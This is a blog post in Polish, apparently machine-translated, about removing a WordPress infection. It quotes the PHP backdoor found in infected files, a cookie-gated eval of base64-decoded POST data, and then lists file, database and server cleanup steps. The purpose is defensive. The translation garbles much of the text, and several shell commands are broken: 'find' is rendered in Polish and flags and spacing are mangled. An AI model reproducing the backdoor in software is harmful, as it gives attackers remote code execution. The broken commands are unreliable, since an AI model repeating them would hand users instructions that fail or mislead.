Zanim przeczytasz ten post, powinieneś zobaczyć post tutaj, Aby coś zrozumieć. :)
Znalazłem to w kilku plikach blogów na stealthsettings.com, kody podobne do poniższych, które pojawiły się w wyniku wirusa z rozszerzeniem wyczyn WordPress.:
si
<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>
Jeśli to powyższy plik xmlrpc.php z SennyAle w grep serwer, można zobaczyć, że istnieje całkiem sporo tego typu w kodzie źródłowym.
Czyszczenie zainfekowane pliki:
Ooookkkk ...
1. Najlepszym rozwiązaniem, po tym, jak backupI oczyszczone bazy danych jest wycierać akta WordPress (możesz zachować wp-config.php i pliki, które nie są ściśle związane z platformą wp, po ich dokładnym sprawdzeniu) z serwera i załadować oryginalne z wersji 2.5.1 (Podczas tego dokonać aktualizacji WP wersja :)) http://wordpress.org/download/ . Przetrzyj tym pliki motywu, jeśli nie ufa się ich uważnego sprawdzenia.
Wydaje się, że zostały naruszone oraz pliki tematów, które nie zostały wykorzystane, zanim na blogu i po prostu zmienić temat, nie rozwiąże problemu.
./andreea/wp-content/themes/default/index.php:
2. Wyszukać i usunąć wszystkie pliki zawierające: * _new.php, * _old.php, * Jpgg, * Giff, * Pngg i pliku wp-info.txt, jeśli istnieje....
odnaleźć. -name „* _new.php”
odnaleźć. -name „* _old.php”
odnaleźć. -name „* .jpgg”
odnaleźć. -name „* _giff”
odnaleźć. -name „* _pngg”
odnaleźć. -name „wp-info.txt”
3. w / Tmp , Wyszukiwanie i usuwanie folderów, takich jak tmpYwbzT2
Czyszczenie SQL :
1. w tabeli Table wp_options sprawdzić, czy nie jest usunąć linie: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.
2. Wszystko w wp_options, iść do active_plugins i usunąć, jeśli istnieje plugin, który kończy się w jednym z rozszerzeń * _new.php, * _old.php, *. jpgg, *. giff, *. pngg lub inny numer wewnętrzny jest podejrzana, sprawdź dokładnie.
3. W tabeli wp_users, Czy jest użytkownik, który nie napisał nic w jego prawej, kolumna user_nicename. Usuń tego użytkownika, ale zapamiętaj numer w kolumnie ID. Ten użytkownik prawdopodobnie użyje „WordPress„Ca user_login i wydaje się być stworzony na 00: 00: 00 0000-00-00.
4. Przejdź do tabeli wp_usermeta i usunąć wszystkie linie należące ID powyżej.
Po wykonaniu tego czyszczenia sql wyłącz, a następnie aktywuj dowolną wtyczkę. (w blogu -> Dashboard -> Plugins)
Bezpieczny serwer:
1. Zobacz, jakie katalogi i pliki są "zapisywalny"(chmod 777) i spróbuj umieścić a chmod które nie pozwolą już na ich pisanie na żadnym poziomie. (chmod 644, na przykład)
Znajdź. -Perm-2-ls
2. Zobacz, jakie pliki mają ustawiony bit suid lub sgid . Jeśli nie używasz te pliki umieścić na nich chmod 0 lub odinstalować pakiet, który zawiera. Są bardzo niebezpieczne, ponieważ wykonanie uprawnień "grupa"Lub"korzeń"A nie z normalnych uprawnień użytkowników do wykonywania tego pliku.
find /-type f-perm-04000-ls
find /-type f-perm-02000-ls
3. Sprawdź, które porty są otwarte i próby zamknięcia lub zabezpieczenia tych, które nie są używane.
netstat-an | grep-i słuchać
O nim. Widzę Niektóre blogi są zakazane de Google Search a inni mówią: „Dobrze im zrobił!!!” . Cóż, zrobiłbym to dla nich… ale co powiesz, jeśli Google zacznie banować wszystkie strony formowanie JEST SPAM i umieścić trojanów (Trojan.Clicker.HTML) w plikach cookie?
1 myśl na temat „WordPress Exploit – czyszczenie plików wirusów, bezpieczeństwo SQL i serwerów.”